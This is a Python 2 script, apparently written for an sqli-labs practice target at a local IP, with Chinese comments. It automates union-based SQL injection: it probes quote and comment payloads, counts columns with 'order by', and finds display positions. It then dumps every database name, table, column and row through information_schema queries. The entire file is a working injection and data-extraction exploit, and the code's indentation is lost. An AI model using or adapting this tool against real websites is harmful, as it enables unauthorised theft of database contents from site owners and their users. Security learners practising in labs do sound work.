1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
| # coding=UTF-8
import requests
import re
import base64
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
# 验证是否有注入
def yanzhengceshi(url,html_text1):
global jieduan
zhushifu = ['%23', '--+']
for i in zhushifu:
xurl = url + i
print xurl
rurl_text = requests.get(xurl)
html_text3 = len(rurl_text.text)
print html_text3
rurl_base = base64.b64encode(rurl_text.text)
html_chaju = abs(html_text1 - html_text3)
if (html_chaju < 8 ):
jieduan[1] = i
print xurl
return xurl
# 找到报错点
def ceshi():
global start_url, i, lists, jieduan
global jieduan
# 最初始的URL请求信息
start_url_text = requests.get(start_url)
print start_url
html_text1 = len(start_url_text.text)
print html_text1
start_url_base = base64.b64encode(start_url_text.text)
# 截断后的信息
url = start_url + i
url2 = url + ' and 1=2'
print url
url_text = requests.get(url2)
print url2
html_text2 = len(url_text.text)
print html_text2
url_base = base64.b64encode(url_text.text)
jieguo = yanzhengceshi(url,html_text1)
html_chaju = abs(html_text1 - html_text2)
print html_chaju
if (html_chaju > 15) and jieguo:
print jieguo
lists.append(jieguo)
print "i=={}".format(i)
jieduan[0] = i
# 拼接截断字符
def testsql():
global start_url
global start_url, i, lists, jieduan
lists = []
jieduan = ['', '']
playload = ["\'", "\')", "\"", "\")", ""]
for i in playload:
ceshi()
print i
print lists
if lists:
print "[!]存在注入,注入点为{}".format(lists[0])
return jieduan
else:
print "[!]不存在注入,程序退出"
exit()
# 查询字段位数
def chaziduanqingqiu(czdqq_url):
shuju = requests.get(czdqq_url)
html_text4 = len(shuju.text)
return html_text4
# 拼接字段位数
def chaziduan():
global start_url, jieduan
# print "截断{}".format(jieduan[0])
chushi = ''
czd_url = start_url
ziduanshu = []
zhuruziduan = []
print "截断[0]为{}".format(jieduan[0])
for i in range(1, 15):
czd_url = start_url + jieduan[0] + ' order by ' + str(i) + jieduan[1]
print czd_url
print i
shuzhi = chaziduanqingqiu(czd_url)
ziduanshu.append(shuzhi)
print ziduanshu
for i in range(len(ziduanshu) - 1):
if (abs(ziduanshu[i]-ziduanshu[i+1]) > 5):
print "[!]注入字段数为{}".format(i + 1)
zhuruziduan.append(i + 1)
print ziduanshu
return zhuruziduan
# 查询显示位
def chaxianshiweiqingqiu(strings, liebiao):
shuju = requests.get(url=strings)
xiabiao = []
print shuju.text
for i in range(len(liebiao)):
r = r"[^']0xxk{}[^']".format(i)
print r
jieguo = re.search(r, shuju.text)
print jieguo
if jieguo:
print i
xiabiao.append(i)
print xiabiao
print "---"
return xiabiao
# 拼接显示位
def chaxianshiwei():
global start_url, ziduan, jieduan,xunhuanziduan
print "[!]可注入的下标为:",
chushi_url = start_url
xianshiziduan = ziduan
xiabiao = []
for m in xianshiziduan:
liebiao = []
MC = ''
stringS = ''
strings = ''
for i in range(m):
MC = '0xxk' + str(i)
mingcheng = MC
liebiao.append(mingcheng)
stringS += '\'' + mingcheng + '\''
strings = stringS
stringS += ','
strings = start_url + jieduan[0] + " and 1=2 union select " + strings + jieduan[1]
print strings
print '666'
print liebiao
xiabiao = chaxianshiweiqingqiu(strings, liebiao)
if not xiabiao:
continue
xunhuanziduan = len(liebiao)
print len(liebiao)
print "12345"
for i in range(len(xiabiao)):
print "{}".format(xiabiao[i]),
return xiabiao
# 在这里取出爆破出的数据
def zongchaxun(ChuShi_url):
shuju = requests.get(url=ChuShi_url)
r = r"\*{3}([^,]*)\*{3}"
CXlist = re.findall(r, shuju.text)
for i in range(len(CXlist)):
CXlist[i] = str(CXlist[i])
return CXlist
# 在这里拼接所有的PlayLoad
def pingjiePL(yuju):
global start_url, jieduan, xunhuanziduan, xiabiao
chushi_url = start_url + jieduan[0] + " and 1=2" + " union select "
for i in range(int(xunhuanziduan)):
if i == xiabiao[0]:
chushi_url += yuju
else:
chushi_url += str(i)
ChuShi_url = chushi_url
chushi_url += ','
print '\n',
ChuShi_url += " " + jieduan[1]
print ChuShi_url
list = zongchaxun(ChuShi_url)
return list
# 开始暴库
def baoku():
global start_url, xunhuanziduan, xiabiao
global jieduan
yuju = "(select group_concat('***',schema_name,'***,') from information_schema.schemata),"
playload_ku = pingjiePL(yuju)
if playload_ku:
print "网站数据库有:"
for i in playload_ku:
print i
return playload_ku
else:
print "网站没有数据库"
# 开始爆表
def baobiao():
global start_url, xunhuanziduan, xiabiao, table_schema
global jieduan
yuju = "(select group_concat('***',table_name,'***,') from information_schema.tables where table_schema='" + table_schema + "\'),"
playload_tables = pingjiePL(yuju)
if playload_tables:
print "{}数据库有如下表:".format(table_schema)
for i in playload_tables:
print i
return playload_tables
else:
print "{}没有表".format(table_schema)
# 开始爆字段
def baoziduan():
global start_url, xunhuanziduan, table_schema, xiabiao, table_name
global jieduan
yuju = "(select group_concat('***',column_name,'***,') from information_schema.columns where table_name='{}' and table_schema='{}'),".format(
table_name, table_schema)
playload_columns = pingjiePL(yuju)
print len(playload_columns)
if playload_columns:
print "{}数据库有如下字段:".format(table_name)
for i in playload_columns:
print i
return playload_columns
else:
print "{}没有字段".format(table_name)
# 开始爆数据
def baoshuju():
global xunhuanziduan, table_name, table_schema, xiabiao, column_name
global start_url
global jieduan
yuju = "(select group_concat("
yuju_One = yuju
for i in range(len(column_name)):
yuju_One += "'***',{},'***,'".format(column_name[i])
yuju = yuju_One
yuju_One += ','
yuju += ") from {}.{}),".format(table_schema, table_name)
playload_shuju = pingjiePL(yuju)
for i in range(len(playload_shuju)):
if i % len(column_name) == 0:
print '\n',
print playload_shuju[i],'::',
def main():
global start_url, ziduan, xiabiao, jieduan, table_schema, table_name, column_name, xunhuanziduan
start_url = "http://192.168.107.128/sqli/Less-1/?id=1"
jieduan = testsql() # 截断字符
print "总的截断为{}".format(jieduan)
ziduan = chaziduan() # 有多少显示位
print ziduan
print '1111111'
xiabiao = chaxianshiwei() # 显示位下标
print "可显示下标为{}".format(xiabiao)
print "有{}位显示位".format(xunhuanziduan)
playload_ku = baoku() # 爆出的数据库
table_schema = raw_input("请输入要爆的数据库名")
playload_tables = baobiao() # 爆出的表
table_name = "servers"
playload_columns = baoziduan() # 爆出的字段
column_name = playload_columns
playload_shuju = baoshuju() # 爆出的数据
if __name__ == '__main__':
main()
|
